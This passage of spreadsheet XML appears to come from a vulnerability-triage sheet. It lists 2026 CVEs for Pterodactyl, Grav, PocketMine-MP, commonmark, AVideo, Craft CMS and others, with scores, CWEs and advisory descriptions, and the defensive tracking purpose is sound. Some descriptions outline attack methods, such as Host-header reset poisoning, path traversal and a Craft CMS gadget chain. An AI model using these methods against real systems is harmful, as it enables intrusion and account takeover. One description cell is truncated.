          <t>Pterodactyl Panel before 1.14.1 fails to validate action-specific permissions in scheduled task creation, allowing subusers with only schedule.update permission to execute arbitrary console commands. Attackers can create and immediately trigger scheduled tasks that run game-server console commands, control server power state, or create backups without proper authorization checks.</t>
        </is>
      </c>
      <c r="M1330" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86177</t>
        </is>
      </c>
    </row>
    <row r="1331">
      <c r="A1331" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1331" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86193</t>
        </is>
      </c>
      <c r="C1331" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1331" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1331" s="5" t="inlineStr"/>
      <c r="F1331" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1331" s="5" t="inlineStr"/>
      <c r="H1331" s="5" t="inlineStr"/>
      <c r="I1331" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1331" s="5" t="inlineStr"/>
      <c r="K1331" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L1331" s="5" t="inlineStr">
        <is>
          <t>grav-plugin-api before 1.0.20 fails to validate group-inherited super permissions in user-management guards, allowing non-super user managers to modify super-admin accounts. Attackers with api.access and api.users.write can patch password fields on group-super accounts to gain full administrative control.</t>
        </is>
      </c>
      <c r="M1331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86193</t>
        </is>
      </c>
    </row>
    <row r="1332">
      <c r="A1332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86195</t>
        </is>
      </c>
      <c r="C1332" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1332" s="5" t="inlineStr"/>
      <c r="F1332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1332" s="5" t="inlineStr"/>
      <c r="H1332" s="5" t="inlineStr"/>
      <c r="I1332" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1332" s="5" t="inlineStr"/>
      <c r="K1332" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L1332" s="5" t="inlineStr">
        <is>
          <t>grav-plugi</t>
        </is>
      </c>
      <c r="M1332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86195</t>
        </is>
      </c>
    </row>
    <row r="1333">
      <c r="A1333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86196</t>
        </is>
      </c>
      <c r="C1333" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1333" s="5" t="inlineStr"/>
      <c r="F1333" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1333" s="5" t="inlineStr"/>
      <c r="H1333" s="5" t="inlineStr"/>
      <c r="I1333" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1333" s="5" t="inlineStr"/>
      <c r="K1333" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L1333" s="5" t="inlineStr">
        <is>
          <t>Grav API plugin versions before 1.0.20 build password reset links from the untrusted Host header in the forgot-password endpoint, allowing unauthenticated attackers to redirect reset tokens to attacker-controlled domains. Attackers can send password reset requests for any account with a malicious Host header, intercept the reset token from victim emails, and complete account takeover including super-admin accounts.</t>
        </is>
      </c>
      <c r="M1333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86196</t>
        </is>
      </c>
    </row>
    <row r="1334">
      <c r="A1334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86199</t>
        </is>
      </c>
      <c r="C1334" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1334" s="5" t="inlineStr"/>
      <c r="F1334" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1334" s="5" t="inlineStr"/>
      <c r="H1334" s="5" t="inlineStr"/>
      <c r="I1334" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1334" s="5" t="inlineStr"/>
      <c r="K1334" s="5" t="inlineStr">
        <is>
          <t>CWE-184</t>
        </is>
      </c>
      <c r="L1334" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.43.1 fail to properly validate the Certificate field during offline login authentication. Unauthenticated players can trigger an uninitialized property access error that crashes the server.</t>
        </is>
      </c>
      <c r="M1334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86199</t>
        </is>
      </c>
    </row>
    <row r="1335">
      <c r="A1335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86201</t>
        </is>
      </c>
      <c r="C1335" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1335" s="5" t="inlineStr"/>
      <c r="F1335" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1335" s="5" t="inlineStr"/>
      <c r="H1335" s="5" t="inlineStr"/>
      <c r="I1335" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1335" s="5" t="inlineStr"/>
      <c r="K1335" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1335" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 5.41.1 contains a denial of service vulnerability in LoginPacket processing where large or complex structures in unknown clientData JWT properties cause excessive logging without sanitization. Attackers can send crafted LoginPackets with deeply nested or massive object structures to trigger out-of-memory conditions and crash the server.</t>
        </is>
      </c>
      <c r="M1335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86201</t>
        </is>
      </c>
    </row>
    <row r="1336">
      <c r="A1336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86250</t>
        </is>
      </c>
      <c r="C1336" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1336" s="5" t="inlineStr"/>
      <c r="F1336" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1336" s="5" t="inlineStr"/>
      <c r="H1336" s="5" t="inlineStr"/>
      <c r="I1336" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J1336" s="5" t="inlineStr"/>
      <c r="K1336" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1336" s="5" t="inlineStr">
        <is>
          <t>h3 versions before 2.0.1-rc.18 fail to validate the chunk count parsed from user-controlled cookie values in setChunkedCookie() and deleteChunkedCookie() functions. Attackers can send a crafted cookie header with an extremely large chunk count to trigger an O(n²) cleanup loop that hangs the server process.</t>
        </is>
      </c>
      <c r="M1336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86250</t>
        </is>
      </c>
    </row>
    <row r="1337">
      <c r="A1337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86427</t>
        </is>
      </c>
      <c r="C1337" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1337" s="5" t="inlineStr"/>
      <c r="F1337" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1337" s="5" t="inlineStr"/>
      <c r="H1337" s="5" t="inlineStr"/>
      <c r="I1337" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1337" s="5" t="inlineStr"/>
      <c r="K1337" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L1337" s="5" t="inlineStr">
        <is>
          <t>LibreNMS before 26.8.0 contains an argument injection vulnerability in the graph_title parameter that allows authenticated attackers to inject arbitrary rrdtool arguments by breaking out of double-quote escaping. Attackers can inject DEF and LINE arguments to read RRD files from unauthorized devices, or use newline injection to execute arbitrary rrdtool commands, bypassing per-device authorization checks.</t>
        </is>
      </c>
      <c r="M1337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86427</t>
        </is>
      </c>
    </row>
    <row r="1338">
      <c r="A1338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86428</t>
        </is>
      </c>
      <c r="C1338" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1338" s="5" t="inlineStr"/>
      <c r="F1338" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1338" s="5" t="inlineStr"/>
      <c r="H1338" s="5" t="inlineStr">
        <is>
          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="I1338" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1338" s="5" t="inlineStr"/>
      <c r="K1338" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1338" s="5" t="inlineStr">
        <is>
          <t>commonmark versions from 1.5.0 before 2.10.0 contain a denial of service vulnerability in the AttributesExtension when processing distinctly-named attributes. Attackers can submit Markdown with numerous distinct attribute names to cause quadratic-time attribute merging and filtering, consuming disproportionate CPU resources and preventing legitimate requests from completing.</t>
        </is>
      </c>
      <c r="M1338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86428</t>
        </is>
      </c>
    </row>
    <row r="1339">
      <c r="A1339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86429</t>
        </is>
      </c>
      <c r="C1339" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1339" s="5" t="inlineStr"/>
      <c r="F1339" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1339" s="5" t="inlineStr"/>
      <c r="H1339" s="5" t="inlineStr">
        <is>
          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="I1339" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1339" s="5" t="inlineStr"/>
      <c r="K1339" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1339" s="5" t="inlineStr">
        <is>
          <t>The league/commonmark (thephpleague/commonmark) library in versions &gt;= 1.5.0 and &lt; 2.9.1 contains quadratic parsing complexity in its SmartPunctExtension and AttributesExtension. When either extension is explicitly registered on the Environment (they are not enabled by default and are excluded from the standard CommonMark and GitHub-Flavored Markdown converters), an unauthenticated attacker can submit small, specially crafted Markdown documents — such as text alternating with unpaired quotes, contiguous runs of block-level attribute blocks, or repeated class attributes — to trigger disproportionate CPU consumption and cause a denial of service. Fixed in 2.9.1.</t>
        </is>
      </c>
      <c r="M1339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86429</t>
        </is>
      </c>
    </row>
    <row r="1340">
      <c r="A1340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86430</t>
        </is>
      </c>
      <c r="C1340" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1340" s="5" t="inlineStr"/>
      <c r="F1340" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1340" s="5" t="inlineStr"/>
      <c r="H1340" s="5" t="inlineStr">
        <is>
          <t>thephpleague:commonmark</t>
        </is>
      </c>
      <c r="I1340" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1340" s="5" t="inlineStr"/>
      <c r="K1340" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1340" s="5" t="inlineStr">
        <is>
          <t>league/commonmark versions before 2.9.1 contain multiple denial of service vulnerabilities in fenced code block detection, reference link label lookup, and emphasis delimiter processing that perform super-linear work on crafted input. Attackers can submit specially crafted Markdown with long backtick runs, nested brackets, or delimiter sequences to consume disproportionate CPU time and prevent legitimate requests from completing.</t>
        </is>
      </c>
      <c r="M1340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86430</t>
        </is>
      </c>
    </row>
    <row r="1341">
      <c r="A1341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86433</t>
        </is>
      </c>
      <c r="C1341" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1341" s="5" t="inlineStr"/>
      <c r="F1341" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1341" s="5" t="inlineStr"/>
      <c r="H1341" s="5" t="inlineStr"/>
      <c r="I1341" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1341" s="5" t="inlineStr"/>
      <c r="K1341" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1341" s="5" t="inlineStr">
        <is>
          <t>commonmark versions from 1.5.0 before 2.8.4 contain a denial of service vulnerability in the Attributes extension where AttributesListener::findTargetAndDirection() performs quadratic-time sibling list scanning. Unauthenticated attackers can submit approximately 32 KB of repeated attribute blocks to cause parsing to take over 5 seconds, exhausting server resources.</t>
        </is>
      </c>
      <c r="M1341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86433</t>
        </is>
      </c>
    </row>
    <row r="1342">
      <c r="A1342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86434</t>
        </is>
      </c>
      <c r="C1342" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1342" s="5" t="inlineStr"/>
      <c r="F1342" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1342" s="5" t="inlineStr"/>
      <c r="H1342" s="5" t="inlineStr"/>
      <c r="I1342" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1342" s="5" t="inlineStr"/>
      <c r="K1342" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1342" s="5" t="inlineStr">
        <is>
          <t>league/commonmark versions &gt;= 2.0.0 and &lt; 2.8.4 (patched in 2.9.0) contain a denial of service vulnerability in UniqueSlugNormalizer::normalize(), which restarts its numeric-suffix search from 1 on every slug collision, resulting in O(K^2) time complexity for K headings that collapse to the same base slug. The vulnerable path is reached when HeadingPermalinkExtension, FootnoteExtension, or TableOfContentsExtension is registered. An unauthenticated attacker can force many headings onto a single base slug (e.g., via empty ATX headings, identical heading text, or punctuation-only headings) in a small Markdown document, consuming excessive CPU and denying service.</t>
        </is>
      </c>
      <c r="M1342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86434</t>
        </is>
      </c>
    </row>
    <row r="1343">
      <c r="A1343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86435</t>
        </is>
      </c>
      <c r="C1343" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1343" s="5" t="inlineStr"/>
      <c r="F1343" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1343" s="5" t="inlineStr"/>
      <c r="H1343" s="5" t="inlineStr"/>
      <c r="I1343" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1343" s="5" t="inlineStr"/>
      <c r="K1343" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L1343" s="5" t="inlineStr">
        <is>
          <t>commonmark versions from 1.5.0 before 2.8.4 contain a denial of service vulnerability in the Footnote extension that fails to deduplicate footnote definitions. Attackers can craft documents with duplicate footnote definitions and references to create quadratic output expansion, consuming excessive memory and CPU to exhaust server resources.</t>
        </is>
      </c>
      <c r="M1343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86435</t>
        </is>
      </c>
    </row>
    <row r="1344">
      <c r="A1344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86439</t>
        </is>
      </c>
      <c r="C1344" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1344" s="5" t="inlineStr"/>
      <c r="F1344" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1344" s="5" t="inlineStr"/>
      <c r="H1344" s="5" t="inlineStr"/>
      <c r="I1344" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1344" s="5" t="inlineStr"/>
      <c r="K1344" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1344" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 fail to validate filesystem paths in MCP tool arguments, allowing attackers to read, create, overwrite and delete files outside the project directory. Attackers can supply path arguments containing directory traversal sequences to access arbitrary Markdown files accessible to the server process.</t>
        </is>
      </c>
      <c r="M1344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86439</t>
        </is>
      </c>
    </row>
    <row r="1345">
      <c r="A1345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86452</t>
        </is>
      </c>
      <c r="C1345" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1345" s="5" t="inlineStr"/>
      <c r="F1345" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1345" s="5" t="inlineStr"/>
      <c r="H1345" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="I1345" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1345" s="5" t="inlineStr"/>
      <c r="K1345" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L1345" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP permit unauthenticated or weakly constrained request paths to perform persistent work without adequate input bounds or rate limiting.
The users/forgot password-reset endpoint accepted an attacker-controlled email value without first imposing a reasonable length bound or validating its format. That value was then used to create an audit log entry and queue a password-reset job, causing the supplied value to be persisted more than once per request. The commit explicitly states that an unbounded unauthenticated request field was stored twice per call with no throttle.
The fix adds:
  *  
a maximum email input length of 1024 bytes;
  *  
email-format validation before persistent work;
  *  
a per-source pre-authentication request budget;
  *  
HTTP 429 responses when that budget is exceeded;
  *  
a 15-minute cooldown for API-access request emails;
  *  
POST-only handling and CSRF protection for the API-access request endpoint.
The new flood filter is specifically intended to limit persistent storage costs from anonymous requests such as password resets, registrations, and failed REST authentication attempts.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="M1345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86452</t>
        </is>
      </c>
    </row>
    <row r="1346">
      <c r="A1346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86538</t>
        </is>
      </c>
      <c r="C1346" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1346" s="5" t="inlineStr"/>
      <c r="F1346" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1346" s="5" t="inlineStr"/>
      <c r="H1346" s="5" t="inlineStr"/>
      <c r="I1346" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J1346" s="5" t="inlineStr"/>
      <c r="K1346" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1346" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 contain a path traversal vulnerability in the POST /api/templates/preview endpoint that allows unauthenticated attackers to read arbitrary files. Attackers can supply directory traversal sequences in the templateFile parameter to bypass path restrictions and read sensitive files like credentials and configuration through the JSON response.</t>
        </is>
      </c>
      <c r="M1346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86538</t>
        </is>
      </c>
    </row>
    <row r="1347">
      <c r="A1347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86721</t>
        </is>
      </c>
      <c r="C1347" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1347" s="5" t="inlineStr"/>
      <c r="F1347" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1347" s="5" t="inlineStr"/>
      <c r="H1347" s="5" t="inlineStr"/>
      <c r="I1347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1347" s="5" t="inlineStr"/>
      <c r="K1347" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L1347" s="5" t="inlineStr">
        <is>
          <t>AVideo through commit c3edcc274c contains an authorization bypass vulnerability where a session cookie named 'key' with value 'value' overrides the $_REQUEST['key'] parameter in saveLive.php and related endpoints. Attackers can publish to any user's RTMP stream without authentication by using the known constant stream key value to hijack live broadcasts.</t>
        </is>
      </c>
      <c r="M1347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86721</t>
        </is>
      </c>
    </row>
    <row r="1348">
      <c r="A1348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86727</t>
        </is>
      </c>
      <c r="C1348" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1348" s="5" t="inlineStr"/>
      <c r="F1348" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1348" s="5" t="inlineStr"/>
      <c r="H1348" s="5" t="inlineStr"/>
      <c r="I1348" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1348" s="5" t="inlineStr"/>
      <c r="K1348" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1348" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 contains an information disclosure vulnerability in plugin/Live/stats.json.php that allows unauthenticated attackers to retrieve stream keys and m3u8 URLs by accessing the endpoint without authentication. Attackers can enumerate private, unlisted, and group-restricted live streams by parsing the hidden_applications array in the JSON response to obtain sensitive streaming credentials.</t>
        </is>
      </c>
      <c r="M1348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86727</t>
        </is>
      </c>
    </row>
    <row r="1349">
      <c r="A1349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86728</t>
        </is>
      </c>
      <c r="C1349" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1349" s="5" t="inlineStr"/>
      <c r="F1349" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1349" s="5" t="inlineStr"/>
      <c r="H1349" s="5" t="inlineStr"/>
      <c r="I1349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1349" s="5" t="inlineStr"/>
      <c r="K1349" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1349" s="5" t="inlineStr">
        <is>
          <t>AVideo through 29.0 contains an authentication bypass vulnerability in plugin/PlayLists/epg.json.php that exposes live-stream keys and private EPG schedules to unauthenticated users. Attackers can request the endpoint with sequential user or playlist IDs to retrieve sensitive credentials, server identifiers, and complete programme schedules without authentication.</t>
        </is>
      </c>
      <c r="M1349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86728</t>
        </is>
      </c>
    </row>
    <row r="1350">
      <c r="A1350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86730</t>
        </is>
      </c>
      <c r="C1350" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1350" s="5" t="inlineStr"/>
      <c r="F1350" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1350" s="5" t="inlineStr"/>
      <c r="H1350" s="5" t="inlineStr"/>
      <c r="I1350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1350" s="5" t="inlineStr"/>
      <c r="K1350" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1350" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions before 5.10.12 fail to properly cleanse string-typed field-layout elements, allowing authenticated control-panel users to inject Yii2 behavior attachments and event handlers. Attackers can post field-layout tab elements as JSON strings to bypass cleanse validation, then trigger arbitrary object instantiation and code execution through Craft::createObject().</t>
        </is>
      </c>
      <c r="M1350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86730</t>
        </is>
      </c>
    </row>
    <row r="1351">
      <c r="A1351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86732</t>
        </is>
      </c>
      <c r="C1351" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="D1351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1351" s="5" t="inlineStr"/>
      <c r="F1351" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1351" s="5" t="inlineStr"/>
      <c r="H1351" s="5" t="inlineStr"/>
      <c r="I1351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1351" s="5" t="inlineStr"/>
      <c r="K1351" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1351" s="5" t="inlineStr">
        <is>
          <t>Craft CMS versions before 5.10.12 contain a remote code execution vulnerability in the element-index endpoint that allows authenticated content editors to instantiate arbitrary classes through the criteria parameter. Attackers can inject a malicious class via criteria[withTransforms][0][class] that reaches ImageTransforms::normalizeTransform(), then use a PHP gadget chain with yii\rbac\PhpManager to execute code by pointing itemFile to a request log containing PHP payload in the User-Agent header.</t>
        </is>
      </c>
      <c r="M1351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86732</t>
        </is>
      </c>
    </row>
    <row r="1352">
      <c r="A1352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
